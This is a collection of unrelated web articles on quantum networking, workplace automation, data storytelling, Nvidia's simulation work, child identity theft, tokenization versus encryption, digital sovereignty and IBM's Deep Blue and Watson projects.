Ideally, he thinks long links will use the same protocol suite, but he accepts short links might need different protocols from long distances: “The middle layers that get triggered into communication may be different for short and long distance communication. But I would say it is important to build a protocol suite that's as universal as possible. And I can tell you, one thing that makes the classical Internet so successful is the ability to interconnect heterogeneous networks.”
Suchara is already looking at heterogeneity: “There are different types of encoding of quantum information. One type is continuous variable. The other type is discrete variable. You can have hybrid entanglement between continuous variable and discrete variable systems. We want to explore the theoretical protocols that would allow connecting these systems - and also do a demonstration that would allow transmission of both of these types of entanglement on the Argonne Labs quantum link network.”
The Argonne group has a quantum network simulator to try out ideas: “We have a working prototype of the protocol. And a simulator that allows evaluation of alternative protocol design. It’s an open source tool that's available for the community. And our plan is to keep extending the simulator with new functionality.”
How far can it go?
Making quantum networks extend over long distances will be hard because of the imperfections of entanglement generation and of the repeaters, as well as the fact that single photons on a long fiber will eventually get lost.
“This is a technological limitation,” says Kozlowski. “Give us enough years and the hardware will be good enough to distribute entanglement over longer and longer distances.”
It’s not clear how quickly we’ll get there. Kozlowski estimates practical entanglement-based quantum networks might exist in 10 to 15 years.
This is actually a fast turnaround, and the quantum Internet will be skipping past decades of trial and error in the classical world. by starting with layered protocol stacks and software-defined networking.
The step beyond to distributing quantum computing, will be a harder one to take, because at present quantum computers mostly use superconducting or trapped-ion qubits, and these don’t inherently interact with photons.
Why do it?
At this stage, it may all sound too complex. Why do it?
Professor Kozlowski spells out what the quantum Internet is not: “It is not aimed to replace the classical Internet. Because, just as a quantum computer will not replace a classical computer, certain things are done quite well, classically. And there's no need to replace that with quantum.”
One spin-off could be improvements to classical networks: “In my opinion, we should use this as an opportunity to improve certain aspects of the OSI model of classical control protocols,” says Suchara.
“For example, one of the issues with the current Internet is security of the control plane. And I think if you do a redesign, it's a great opportunity to build in more security mechanisms into the control plane to improve robustness. Obviously, the Internet has done great over the decades in almost every respect imaginable, but still one of the points that could be improved is the security of the control plane.”
Kozlowski agrees, pointing out that quantum key distribution exists, and there are other quantum cryptography primitives, that can deliver things like better authentication and more secure links.
The improvements in timing could also have benefits, including the creation of longer baseline radio telescopes, and other giant planetary instruments.
The big payoff could be distributing quantum computing, but Kozlowski sounds a note of caution: “Currently it's not 100 percent clear how one would do the computations. We have to first figure out how do we do computations on 10,000 computers, as opposed to one big computer.”
But Steve Brierley wants to see large, practical quantum computers which take high-performance computing (HPC) far beyond its current impressive achievements.
Thanks to today’s HPC systems, Brierley says: “We no longer ‘discover’ aircraft, we design them using fluid dynamics. We have a model of the underlying physics, and we use HPC to solve those equations.”
If quantum computers reach industrial scales, Brierley believes they could bring that same effect to other sectors like medicine, where we know the physics, but can’t yet solve the equations quickly enough.
“We still ‘discover’ new medicines,” he says. “We've decoded the human DNA sequence, but that's just a parts list.”
Creating a medicine means finding a chemical that locks into a specific site on a protein because of its shape and electrical properties. But predicting those interactions means solving equations for atoms in motion.
“Proteins move over time, and this creates more places for the molecule to bind,” he says. “Quantum mechanics tells us how molecules and proteins, atoms and electrons will move over time. But we don't have the compute to solve the equations. And as Richard Feynman put it, we never will, unless we build a quantum computer.”
A quantum computer that could invent any new medicine would be well worth the effort, he says: “I'd be disappointed if the only thing a quantum computer does is optimize some logistics route, or solve a number theory problem that we already know the answer to.”
To get there, it sounds like what we actually need is a distributed quantum computer. And for that, we need the quantum Internet.
This article first appeared in Issue 43 of DCD Magazine | <urn:uuid:65a18bcd-d839-4bcf-bc30-2934d74e0877> | CC-MAIN-2024-38 | https://direct.datacenterdynamics.com/en/analysis/why-do-we-need-a-quantum-internet/ | 2024-09-19T05:14:58Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651981.99/warc/CC-MAIN-20240919025412-20240919055412-00656.warc.gz | en | 0.939488 | 6,240 | 3.578125 | 4 |
Every day, people can see the increased reach that intelligent machines have on our society, from self-checkouts at grocery stores to more intensive robots in manufacturing. Much of the labor force has seen these developments and met them with hesitation, wondering if their jobs were at risk. But workers should not fear this change, as it is simply a shift in how business will be done. It's not eliminating human workers altogether.
While workers worry about their jobs being replaced by intelligent machines in their future, they need to realize that these machines are quickly becoming the present condition of various industries. Automation is the status quo because it leads to a significant increase in productivity. But that doesn’t mean that human workers are disposable. Instead, it means that they should expect the nature and responsibilities of their job to change.
Several industries have already incorporated robots into their operations, and it isn’t just in manufacturing. Skilled workers such as surgeons have also seen their work supplemented by robots. But it should be looked at as such: a supplementation. The purpose of incorporating intelligent machines is not to replace human workers entirely. It is to increase their productivity by making their completion of tasks more efficient.
In the manufacturing industry alone, robot density per worker has doubled in the past five years. However, it takes time for these machines to reach their optimal level of productivity and cost-efficiency, allowing workers to pick up the skills they need to transition their work from one being hands-on and directly completing the task to one where they oversee the work of these machines.
Ready or Not …
Workers need to understand that this shift is coming, whether they like it or not. And with the automation revolution set to occur within the next 15 years, they must act now before it is too late to change their position. Workers can become an integral part of this new way of conducting business by picking up additional skills and undergoing further training. If workers don’t fall victim to the mindset that robots are after their jobs, they will see that there are enormous opportunities opening for them that they may not have otherwise had.
Workers need to embrace the shift toward automation. People should not think that robots are taking their jobs. Instead, they should know that the skills they need to be successful in their occupation are changing. When a robot is installed, it doesn’t immediately begin to perform a task self-sufficiently. It requires oversight, and sometimes even operation, from its human counterparts.
One of the main things that must change before this automation revolution can occur is that the larger culture needs to embrace this shift towards intelligent machines. When pop culture is perpetuating the myth that machine intelligence is inherently evil, it is hard to convince the public that this change actually is beneficial to them. To help this shift occur, we need to ensure that these perceptions change on a mass scale.
Another thing that needs to occur before the widespread transition to automation is more acceptance of intelligent machines from a legal viewpoint. Although certain standards and protections need to be in place to protect those working alongside robots, further regulation can hinder innovation. That innovation is necessary for the field to progress to a point where human and machine workers coexist successfully.
At this point, it would be futile to resist the automation revolution, because it has already begun. However, workers can and should take steps to ensure that they are adapting with these changing industries. Although the adoption of this technology will be widespread, there is still time for workers to get ahead of the curve so that they do not become obsolete once the integration is complete.
About the Author
You May Also Like
Maximizing cloud potential: Building and operating an effective Cloud Center of Excellence (CCoE)
September 10, 2024Radical Automation of ITSM
September 19, 2024Unleash the power of the browser to secure any device in minutes
September 24, 2024 | <urn:uuid:80b03431-cc56-43b9-a6d7-a8a08c0475e7> | CC-MAIN-2024-38 | https://www.informationweek.com/machine-learning-ai/the-automation-revolution-and-the-shift-in-labor | 2024-09-10T18:20:53Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651303.70/warc/CC-MAIN-20240910161250-20240910191250-00556.warc.gz | en | 0.968609 | 792 | 2.984375 | 3 |
The ancient cave paintings at Lascaux and Altamira may seem a long way from our world, but we share a common thread: the urge to tell stories and share insights. 40,000 years ago, people used stories to engage and document their daily lives, reporting about places, people and events. Not so different from today, though we have more powerful tools and data at hand.
In some respects, we may have shifted too far the other way: focusing more on gathering information than communicating what it means.
“When you hear the term data analysis, what do you think of,” says Catherine Cote, marketing coordinator at Harvard Business School Online. “Your mind may jump to scouring spreadsheets, implementing algorithms and making mathematical calculations, all hard skills of data analysis.
“Yet, hard skills are useless without their soft skill counterparts. It’s not enough to just analyze data; you need to know how to communicate the story it tells in a clear, compelling manner – a skill called data storytelling.”
Data storytelling helps people understand at a more human level. It enables them to see relationships, context or connections they might not otherwise notice or care about. Stories convey meaning simply and powerfully: everything from a local crime outbreak to why more people buy fish on Tuesdays. In short, they bring data to life.
It took years for John Snow to find the source of London’s cholera epidemic, articulate the cause and convince others to implement a solution. Using city maps, he connected the dots and confirmed his hunch that the city’s water pumps were the source of the illness.
More recently, journalist Steve Doig analyzed damage patterns from Hurricane Andrew. He used mapping software to correlate property tax assessments with the storm track, and matched wind speeds with building damage reports. He then told the story of how zoning, poor construction and lax building codes clearly contributed to the path of destruction.
“What the best writers of stories, fables and lessons have all realized is that how we deliver information is every bit as important as the information we are conveying,” says Joe DosSantos, Chief Data Officer at Qlik. “The renderings of that information stay with us long after the story is over and make us think, reflect and change our perceptions and behavior.”
We’re also hard-wired for storytelling, and neuroscience backs this up. When we relay basic facts (such as a product’s features and benefits), only two areas of the brain are activated: language comprehension and language processing.
But when we experience a narrative, multiple parts of the brain light up. This includes the visual cortex, the amygdala, which controls our emotions, and mirror neurons – where neurons in the listener’s brain fire in the same patterns as the speaker’s. Storytelling engages the hippocampus too, and there is greater likelihood that the information will be stored in long-term memory.
According to Jennifer Aaker, marketing professor at Stanford’s Graduate School of Business: “Research shows our brains are not hard-wired to understand logic or retain facts for very long. Our brains are wired to understand and retain stories. A story is a journey that moves the listener, and when the listener goes on that journey, they feel different and the result is persuasion and sometimes action.”
Stories have been used in advertising for decades. We already use them in customer studies, testimonials, demos and so on. Data storytelling isn’t such a big leap. (More about best practices and the role of data analytics in part 2.) | <urn:uuid:cb5be718-2328-4578-baa7-79fbedfe3cad> | CC-MAIN-2024-38 | https://stream.cloudnexa.com/category/data-analysis/6649863/09/05/2023/the-human-side-of-the-equation-part-1/ | 2024-09-13T04:10:13Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651507.67/warc/CC-MAIN-20240913034233-20240913064233-00356.warc.gz | en | 0.941612 | 749 | 3.015625 | 3 |
Fifteen years ago, Nvidia made a decision that would eventually place it at the forefront of the artificial intelligence revolution, its chips highly sought after by developers and cloud companies alike.
It decided to change the nature of its graphics processing unit, then primarily used by the video games industry.
“We decided that a GPU, which was a graphics accelerator at the beginning, would become more and more general-purpose,” Nvidia CEO and co-founder Jensen Huang said at the company’s annual GPU Technology Conference in San Jose.
“We did this because we felt that in order to create virtual reality, we had to simulate reality. We had to simulate light, we had to simulate physics, and that simulation has so many different algorithms - from particle physics and fluid dynamics, and ray tracing, the simulation of the physical world requires a general-purpose supercomputing architecture.”
Seeing the light
The impetus to create a general-purpose graphics processing unit (GPGPU) came when Nvidia “saw that there was a pool of academics that were doing something with these gaming GPUs that was truly extraordinary,” Ian Buck, the head of Nvidia’s data center division, told DCD.
“We realized that where graphics was going, even back then, was more and more programmable. In gaming they were basically doing massive simulations of light that had parallels in other verticals - big markets like high performance computing (HPC), where people need to use computing to solve their problems.”
Huang added that, as a result, “it became a common sense computer architecture that is available everywhere. And it couldn’t have come at a better time - when all of these new applications are starting to show up, where AI is writing software and needs a supercomputer to do it, where supercomputing is now the fundamental pillar of science, where people are starting to think about how to create AI and autonomous machines that collaborate with and augment us.
“The timing couldn’t be more perfect.”
Analysts and competitors sometimes question whether Nvidia could have predicted its meteoric rise, or whether it just had the right products at the right time, as the world shifted to embrace workloads like deep learning that are perfect for accelerators. But, whether by chance or foresight, the company has found itself in demand in the data center, in workstations and, of course, in video games.
“We can still operate as one company, build one architecture, build one GPU and have it 85 percent leveraged across all those markets,” Buck said. “And as I’m learning new things and giving [them] to the architecture team, as the gaming guys are learning new things, etc, we’re putting that into one product, one GPU architecture that can solve all those markets.”
With its core GPU architecture finding success in these myriad fields, Nvidia is ready for its next major step - to push further and deeper into simulation, and help create a world it believes will be built out of what we find in those simulations.
The heart of a data center
One of the initiatives the company is working on to illustrate the potential of simulation is Project Clara, an attempt to retroactively turn the 3-5 million medical instruments installed in hospitals around the world into smart systems.
“You take this 15-year old ultrasound machine that’s sitting in a hospital, you stream the ultrasound information into your data center. And your data center, running this stack on top of a GPU server, creates this miracle,” Huang said, as he demonstrated an AI network taking a 2D gray scan of a heart, segmenting out the left ventricle, and presenting it in motion, in 3D and in color.
Nvidia bills Clara as a platform, and has turned to numerous partners, including hospitals and sensor manufacturers, to make it a success. When it comes to software, the company often seeks others, looking to build an ecosystem in which its hardware is key.
Sometimes, Nvidia is happy to take a backseat with software, but there is one area in which the company is clear it hopes to lead - autonomous vehicles. “We’re dedicating ourselves to this. This is the ultimate HPC problem, the ultimate deep learning problem, the ultimate AI problem, and we think we can solve this,” Huang said.
The company operates a fleet of self-driving cars (temporarily grounded after Uber’s fatal crash in March), with each vehicle producing petabytes of data every week, which is then categorized and labeled by more than a thousand ‘trained labelers.’
These vehicles cannot cover enough ground, however, to rival a mere fraction of the number of miles driven by humans in a year. “Simulation is the only path,” Carlos Garcia-Sierra, Nvidia’s business development manager of autonomous vehicles, told DCD.
This approach has been named Drive Constellation, a system which simulates the world in one server, then outputs it to another that hosts the autonomous driver.
Martijn Tideman, product director of TASS International, which operates its own self-driving simulation systems, told DCD: “You need to model the vehicle, create a digital twin. But that’s not enough, you need a digital twin of the world.”
“This is where Nvidia’s skill can really shine,” Jensen said. “We know how to build virtual reality worlds. In the future there will be thousands of these virtual reality worlds, with thousands of different scenarios running at the same time, and our AI car is navigating itself and testing itself in those worlds, and if any scenarios fail, we can jump in and figure out what is going on.”
Following self-driving vehicles, a similar approach is planned for the robotics industry. “I think logically it makes sense to do Drive Constellation for robotics,” Deepu Talla, VP and GM of Autonomous Machines at Nvidia, told DCD.
It is still early days, but Nvidia’s efforts in this area are known as ‘The Isaac Lab,’ - it aims to develop “the perception, the localization, the mapping and the planning capability that is necessary for robots and autonomous machines to navigate complex worlds,” Huang added.
As Nvidia builds what it calls its ‘Perception Infrastructure’ to allow physical systems to be trained in virtual worlds, there are those trying to push the boundaries of simulation - for science.
“There is a definite objective to simulate the world’s climate, in high fidelity, in order to simulate all the cloud layers. Imagine the Earth, gridded up in 2km grids and 3D too,” Buck told DCD. “It’s one of the things that they’re looking for, for exascale.”
Huang said: “We’re going to go build an exascale computer, and all of these simulation times will be compressed from months down to one day. But what’s going to happen at the same time is that we’re going to increase the [complexity of the] simulation model by a factor of 100, and we’re back to three months, and we’re going to find a way to build a 10 exaflops computer. And then the size of science is going to grow again.”
It is this train of thought, of ever more complex simulations on ever more powerful hardware, that has led some to propose the ‘simulation hypothesis’ - that we are all living in a Matrix-like artificial simulation, perhaps within a data center.
We asked Huang about his views on the hypothesis: “The logic is not silly in the sense that how do we really know, how do we really know? Equally not silly is that we’re really machines, we’re just molecular, biological machines, right?
“How do we know that we’re not really a simulation ourselves? At some level you can’t prove it. And so, it’s not any deeper than that. But I think the deeper point is: Who gives a crap?”
This article appeared in the April/May issue of DCD Magazine. Subscribe to the digital and print editions here: | <urn:uuid:64248473-bdfa-49b6-98c9-e4167add30d0> | CC-MAIN-2024-38 | https://www.datacenterdynamics.com/en/analysis/to-conquer-the-world-nvidia-will-simulate-it/ | 2024-09-13T06:03:41Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651507.67/warc/CC-MAIN-20240913034233-20240913064233-00356.warc.gz | en | 0.959876 | 1,758 | 2.625 | 3 |
Generation Alpha, born between 2010 and 2025, already possesses a digital footprint greater than their parents and grandparents combined. Moreover, this heightened tech-savvy generation is thoroughly exposed to multiple digital platforms from a very tender age. Thus, they rely heavily on technology for daily life.
A majority of this generation is growing up in households where the Internet of Things (IoT) technology powers intelligent home appliances, such as light switches, HVAC systems, cooking systems, etc. As a result, it is now widespread to find toddlers familiar and comfortable maneuvering artificial intelligence (AI)-powered systems.
However, the extensive use of technology has also increased cybersecurity threats like online identity theft. Identity theft is not an adult-only problem anymore. The number of cases of child identity theft is also rising. According to Carnegie Mellon University’s CyLab, children are 51 times more vulnerable to identity theft than adults due to certain age-related limitations and privacy protection policies. Additionally:
-In 2017, more than 1 million children became victims of identity theft in the U.S.
-Identity theft resulted in total annual losses of over $2.4 billion.
-Two-thirds of the victims were under the age of eight.
-20 percent of victims were between the ages of eight and 12.
Consequences of child identity theft
Anyone who has a Social Security Number is vulnerable to identity theft. Children are lucrative targets for criminals as they have perfect credit records and theft goes unnoticed for a long time. In addition, hackers can open new lines of credit or commit crimes using the stolen social security number as credit reporting agencies often do not carry out age verification.
Synthetic identity theft is another sinister usage of a stolen identity. Thieves combine real and fictional information for the creation of new identities. Some related threats against children are financial identity theft, tax refund identity theft, employment identity theft, medical identity theft, and criminal identity theft.
Here are some of the long-term consequences of child identity theft:
-With identity theft going unnoticed for a long time, huge debts can pile up.
-Severe damage to credit history.
-The victim would face difficulties when applying for loans.
-Victims may face difficulties getting admission to schools, driving licenses, or even a job due to issues coming up during background checks.
-Emotional stress and trauma are also some of the known consequences arising from child identity theft.
Identity theft against children is typically difficult to detect at a young age because most parents are busy raising their kids. However, parents should regularly conduct background checks on their kids and leverage parental monitoring apps to prevent identity theft.
Prepare today for peace of mind tomorrow.
Get occasional tips about keeping your family and home safe — delivered to your inbox.
Benefits of using parental monitoring apps
Child identity theft often results from sharing personal information on online platforms. Any sensitive information that falls into the wrong hands can wreak havoc in the lives of children in the future. While technology has become an integral part of children’s lives, parental monitoring is necessary to safeguard them from online harassment and cyber threats.
Parental control apps are tools that help to monitor a child’s exposure to the internet. Installing security software and implementing kids’ device control are the first steps to creating a safe online environment. A parental monitoring app controls the online activities of a child. Parental control encourages healthy online habits along with keeping the home network and related devices safe.
Some benefits of parental control apps include:
-Restrict and monitor unsafe sites and contents if they have surveillance and accessibility.
-Filter and block out explicit content.
-Keep data safe by blocking unsafe websites and apps that collect data without the user’s consent.
-Set usage and screen time limits on apps or devices to help instill a healthy lifestyle.
-Peace of mind by supervising all aspects of online activities.
With the increase in IoT devices and internet usage, numerous people worldwide are becoming victims of scams, hacking, malware attacks, and more—including children. Therefore, parents must take the necessary steps to create a safe space for their children online through parental monitoring apps. This, coupled with cybersecurity best practices, can keep children safe against identity theft.
Get started implementing cybersecurity systems in your household. Take Batten’s free quiz for personalized security recommendations for you and your family. | <urn:uuid:66ff8b2d-4ad1-4974-b78c-220b05e6f7d4> | CC-MAIN-2024-38 | https://battensafe.com/resources/how-to-use-parental-control-apps-to-prevent-child-identity-theft/ | 2024-09-16T22:33:50Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651714.51/warc/CC-MAIN-20240916212424-20240917002424-00056.warc.gz | en | 0.949465 | 905 | 3 | 3 |
Tokenization and encryption are two of the most popular data security methods. And while they are often used in conjunction because they disguise personal and sensitive card data and reduce data exposure, they are not interchangeable terms.
When choosing between the two security techniques to protect your data, you have to consider specific factors. Below, we’ll explore tokenization vs. encryption in more detail, as well as outline the differences to help you pick the right data security method for securing sensitive data.
What Is Tokenization?
Tokenization is the process of turning a meaningful piece of data into a random string of characters known as tokens.
A token has no meaningful value and only serves as a substitute for the actual data. What’s more, tokenization doesn’t use a cryptographic method to transform sensitive information into ciphertext, meaning you cannot use the token to guess the original data in case of a data breach.
Imagine an online business accepting payment from a customer using a third-party site like PayPal or Stripe. In this case, the third-party site can disguise the credit card number with other characters (tokens) to protect the customer’s card information. As a result, the business will only see that tokenized information and won’t have access to the actual card number.
Advantages of Tokenization
According to Statista, 540 data breaches alone took place within the first half of 2020. When you collect consumer data, you’re responsible for ensuring its protection. But when you use tokenization software, data gets stored in a third-party database, reducing your in-house responsibility of managing sensitive data. You also aren’t required to maintain the staff and resources needed to protect the collected data, nor are you as likely to reveal that data if you suffer a breach.
Tokenization is a time- and money-saving method, too. While it doesn’t eliminate Payment Card Industry Data Security Standards (PCI DSS) and other compliance requirements, converting the form of vulnerable data effectively reduces your team’s need to prove compliance. As you work with simple software tools and tasks to ensure compliance, you end up saving a lot of valuable time and money.
Disadvantages of Tokenization
Implementing tokenization does certainly add a layer of complexity to your IT structure, with processing transactions becoming more complicated and comprehensive.
It also doesn’t eliminate all security risks. When choosing a vendor to store data, you need to be very careful and ensure they have the appropriate systems in place to protect your data.
Moreover, only a limited number of payment processors support tokenization, which means you’ll either have to change your systems to accommodate this method or opt for a payment processing tool that may not be your first choice.
What Is Encryption?
Encryption is the process that uses mathematical algorithms to transform plain text information or sensitive data into unreadable information called ciphertext, which is generated using an encryption key. To make the text readable again, you would require an algorithm and a description key.
Suppose a company collects personal information like phone numbers, email IDs, and mailing addresses of its customers. It can use ciphertext to protect all information, so it’s only accessible by using an encryption key.
Advantages of Encryption
Through encryption, you can protect a variety of data types, including credit card information, files or emails, and Social Security numbers. While tokenization is more suitable for smaller pieces of data, you can safeguard full documents by encrypting the stored information.
The encryption process uses algorithms to secure data, which makes it faster. Tokenization takes much longer because each character or number is changed into a random character.
Encryption also allows you to share decryption keys with others or access files remotely—all without having to worry about security vulnerabilities. With tokenization, you would have to find a secure way to share your original information for the receiving party to decipher the token. However, with encryption, all they will need is the decryption key.
Disadvantages of Encryption
All data is encrypted using a single key in encryption, so if hackers gain access to that key, everything encrypted using the key becomes vulnerable. This can be an entire database or a single file, depending on whether the encryption is full disk or file-based. Regardless, this can be a significant blow to your IT security.
The other disadvantage is that encryption also hinders software functionality.
It’s possible for the ciphertext used to encrypt data to not be compatible with other software tools, hindering the functionality and value of those applications. You may also have a limited number of vendors to serve your software requirements.
Tokenization vs. Encryption: Exploring the Main Differences
Now that you have a clear understanding of what both terms mean, let’s explore the main differences between the two concepts.
Encryption scrambles your data using a process that’s reversible—provided you have the correct decryption key. You can encrypt your plaintext into ciphertext, which is then transmitted to the recipient, who can decrypt the ciphertext back into plaintext.
Under tokenization, two distinct databases are created: one having the actual data and the other with tokens mapped to each character of the presented data. A tokenization software randomly generates a token value for plain text and stores the mapping in the database. While the process is closely related to encryption, tokenization is irreversible.
Encryption has two primary approaches: symmetric and asymmetric. Symmetric key encryption involves using a single key to encrypt and decrypt data. If the key gets compromised, it will unlock all the hidden data. On the other hand, asymmetric key data uses two different keys—one for encryption and another for decryption. This way, multiple parties can exchange encrypted data without managing the same encryption key.
Tokenization uses tokens to disguise sensitive data or information by replacing the token value with the actual data to allow users to access the original data. The tokens authorize the user or the program to ask for the data, pull the correct token from the token database, and recall the actual data from the database before presenting it to the user or program.
Encryption is a reliable component of payment processing. Without a key to decrypt data, accessing encoded information will always fail. However, you must regularly rotate keys to protect payment information.
On the other hand, a token is a substitute for the information it represents, where participants don’t have to handle credit card information directly. A device-specific or merchant-specific token creates an additional security layer, and it’s possible to deactivate a compromised token in real-time with little to no impact on the customer.
The good thing about encryption is it can provide adequate support for scalability by encrypting large data volumes via mathematical algorithms.
On the contrary, tokenization can present considerable difficulties in disguising data at scale. If you try to tokenize large files or pieces of data, it’ll likely create latency issues, rendering the whole process ineffective.
PCI compliance warrants the safety of payment information as it mandates organizations to apply strict payment industry standards.
Meeting PCI encryption standards can take up a lot of resources and increase operating costs significantly. Contrarily, tokenization reduces the associated cost of PCI compliance as merchants don’t have to handle payment information directly.
Note: Although the tokenization process isn’t a PCI compliance requirement, it’s still considered an established practice in payment processing.
Without encryption, sharing payment information over exposed networks and storing card information is very dangerous. For instance, an ATM may not safely communicate with remote systems and validate card information, creating vulnerabilities.
It’s also widely used to protect communication from individuals and organizations from malicious hackers, as well as safeguard information stored on mobile devices.
Besides protecting payment card data, bank account numbers, email numbers, and so on, you can use tokens to simplify checkouts to drive sales. Customers can use their tokenized data to make purchases without entering their personal data or using their credit cards. Here are a few examples:
- In-app payments: Customers can use mobile apps to pay without closing or exiting the app.
- Digital wallet: Customers can create a token and use their mobile device or wearable to pay for services or goods.
- Recurring payments: E-commerce platforms and merchants commonly store customer tokens to initiate recurring payments without accessing or storing the customer’s card information.
- Pay buttons: Merchants can add pay buttons to their websites to allow customers to pay using previous tokens.
The above examples highlight how tokens make payment processing easy and convenient. In turn, this makes it more likely for customers to go through with their orders.
Tokenization vs. Encryption: What’s the Best for Your Business?
To decide between the two data security techniques, you have to answer a few critical questions:
- Which type of industry are you in, and is your company always prone to data breaches and hacking attempts?
- Are you looking to protect numbers like credit cards and account numbers (tokenization) or entire databases (encryption)?
- Which option would make it easier for you to comply with data security policies?
- Which option would be more feasible based on your budget?
- Based on your company size and customer base, how would tokenization or encryption benefit your company?
While the above are excellent guiding questions, we would recommend using both techniques together— tokenization and encryption—whenever possible. As both the methods are not mutually exclusive, you can employ them together to cover the other’s drawbacks and enhance your company‘s overall data security levels. | <urn:uuid:c96c40b8-78f7-4d26-b940-eb3371d312cd> | CC-MAIN-2024-38 | https://nira.com/tokenization-vs-encryption/ | 2024-09-16T21:44:17Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651714.51/warc/CC-MAIN-20240916212424-20240917002424-00056.warc.gz | en | 0.913163 | 2,002 | 2.90625 | 3 |
A recent Panorama documentary asked us to think differently about the impact of cloud. It raised a thought-provoking question about whether the term ‘the cloud’ accurately reflects the physical reality of the data centres that power it.
Lancaster University Professor Gordon Blair argued that the name creates a perception of an ethereal and untethered technology that doesn’t fully capture the tangible infrastructure that supports it. And the progression of tech giants’ commitments to providing enterprises access to sovereign cloud services has accelerated conversations around digital sovereignty.
Digital sovereignty – a country’s ability to protect and control its digital assets, including data, infrastructure, and networks – is one of the most pressing issues in the regulatory landscape. This is the ability to govern the internet within a country’s borders, safeguard its citizens’ privacy, and secure its critical infrastructure.
64.4 per cent of the total population is online, meaning digital sovereignty is a question for governments the world over. But achieving digital sovereignty is not a straightforward task as countries face geographical and climate limitations, energy security issues, and skills gaps that must be addressed if they want to embrace digital sovereignty meaningfully.
It’s imperative for governments to take a holistic approach to digital sovereignty and create policies that balance the benefits of the cloud with the need for tangible infrastructure to support it.
Resilient digital infrastructure and climate change
While cloud as a definition has an ethereal ring, it is in fact a very physical location, which can be vulnerable to geographical and climate events. Countries located in areas prone to natural disasters may face more challenges in maintaining their digital sovereignty than ones with temperate climates. Floods, hurricanes, and earthquakes can all cause damage to data centres, and with the climate crisis exacerbating these risks, it is important to ensure that backup systems are in place to ensure continued connectivity.
Ensuring that digital infrastructure is resilient to natural disasters and supported by reliable backup systems is crucial to maintaining digital sovereignty and protecting critical data. The example of severe winter storms and power outages in Texas in 2021 caused several data centres to go offline. This resulted in disruptions to critical services, including emergency communications and Covid-19 vaccine scheduling systems. These demonstrate the need for continued investment in resilient infrastructure to people are as least affected as possible.
The demand for energy to power digital infrastructure is increasing rapidly, but this can have detrimental effects on the environment and economy if not approached with caution. The digital economy is heavily reliant on energy, particularly electricity, and countries that lack a reliable and affordable energy supply face challenges in maintaining their digital infrastructure. This poses a significant risk to a country’s economy and digital sovereignty. The high energy consumption of data centres and other digital infrastructure components can have a substantial impact on a country’s energy supply and climate change goals.
Focusing on energy security
Energy security is essential for ensuring a reliable and sustainable energy supply for digital infrastructure. As digital technologies continue to advance and become more pervasive, the demand for energy to power these technologies will only increase. According to a report by the International Energy Agency, data centres alone accounted for approximately 1% of global electricity demand in 2019, and this is expected to increase to 3% by 2030.
To meet the growing energy demands of the digital economy, countries need to develop energy policies that promote energy efficiency measures, invest in renewable energy sources such as geothermal energy and solar panel, and optimise the use of existing energy infrastructure. The transition to renewable energy sources is essential to reducing greenhouse gas emissions and mitigating the impact of climate change.
Not every country will have the same economic and geopolitical access to energy security. As such, they must get creative with how they use the energy emitted by digital infrastructure to ensure they adopt reliable and affordable solutions. For example, in the UK, the energy released from tiny data centres will be used to heat public swimming pools. This type of initiative not only reduces the carbon footprint but also promotes sustainable and reliable energy sources for digital infrastructure.
Plugging the digital skills gap
The rapid pace of technological advancements has created a significant demand for digital skills across various industries. New technologies such as cloud computing, IoT and data analytics has increased the need for skilled labour in these areas. Countries without the necessary expertise in these areas may fall behind in the race to protect their citizens’ data and maintain their digital sovereignty.
Governments must take steps to address the skills gap in the digital economy by investing in education and training programmes that provide individuals with the skills needed to succeed in the digital workforce. Encouraging businesses to offer lifelong learning opportunities as well can also help close the skills gap and ensure that individuals have the necessary skills to succeed in the digital economy.
Additionally, working with partners who provide professional services and combine skills and labour needed to facilitate data migration can be an effective way to accelerate the digital sovereignty journey. By partnering with experienced service providers, governments and businesses can access the expertise and resources needed to implement secure and reliable digital infrastructure.
Achieving digital sovereignty is a complex task that requires a holistic approach to address the challenges associated with it. Governments and businesses must work together to develop a comprehensive strategy that considers the physical challenges of digital infrastructure, including cybersecurity risks, energy demands, and skills gaps. By doing so, they can create a pathway towards a secure and reliable digital infrastructure that enables innovation and growth for businesses and citizens. | <urn:uuid:19b547ae-941b-45ef-8354-af37f2205ac2> | CC-MAIN-2024-38 | https://datacentrereview.com/2023/04/the-battle-for-digital-sovereignty/ | 2024-09-08T10:22:52Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650976.41/warc/CC-MAIN-20240908083737-20240908113737-00856.warc.gz | en | 0.935275 | 1,096 | 3.21875 | 3 |
20/10/2014 | Written by: Think Blog redactie (0cB)
Share this post:
By dr. Maris van Sprang, Ph.D
IBM regularly defines Grand Challenges: setting a clear goal that is challenging to the level of “just not impossible”, that can only be achieved by a multi year cooperation between hardware, software, services and research divisions. Of course, the idea is that the goal will be achieved but even if it eventually turns out to be impossible, it is likely that the results will be valuable anyway and that the “frontier” of the possible will have been pushed towards the impossible.
Just before the end of the millennium, the Grand Challenge was to build a Chess Computer and beat the world chess champion. A very clear goal but in the decades before Deep Blue this seemed completely impossible. Brute force chess programs relied on evaluating every possible move but quickly ran into hardware limits since increasing the depth by one more move of White and Black increases the calculation effort with a factor of 1000. The other approach relied on mimicking the way humans play but they were at most very funny, playing surprisingly ridiculous moves even when you were expecting ridiculous moves. Nevertheless, in 1997 Deep Blue has beaten the reigning world champion Gary Kasparov.
Kasparov vs DeepBlue
Around 2005 Watson became the next Grand Challenge to be launched during IBM’s centennial. The challenge was to build a Cognitive Computer which is a system that resembles the way humans think and at least requires the ability to understand natural language (Natural Language Processing – NLP) and a more robust way than traditional programming is capable of to handle incomplete, conflicting or partial incorrect input data. Machine Learning was the way to go.
These abilities are very wide and complex and despite being research topics for many years progress had not been impressive. But just measuring progress was a problem by itself: how do you measure “understanding natural language”? The system may be good in one area, let’s say “travelling” and bad in another such as “sports”. This results from the fact that the abilities have many “dimensions”. The measuring problem already occurs for 2 dimensions: which object is larger a 3×4 rectangle or a 2×6 rectangle? Without solving this measurement problem first, it would be impossible to track progress (did this change lead to an improvement?) and also would always leave room for discussions in the end (yeah, “travelling” was handled OK, but I am sure “sports” will be handled miserably).
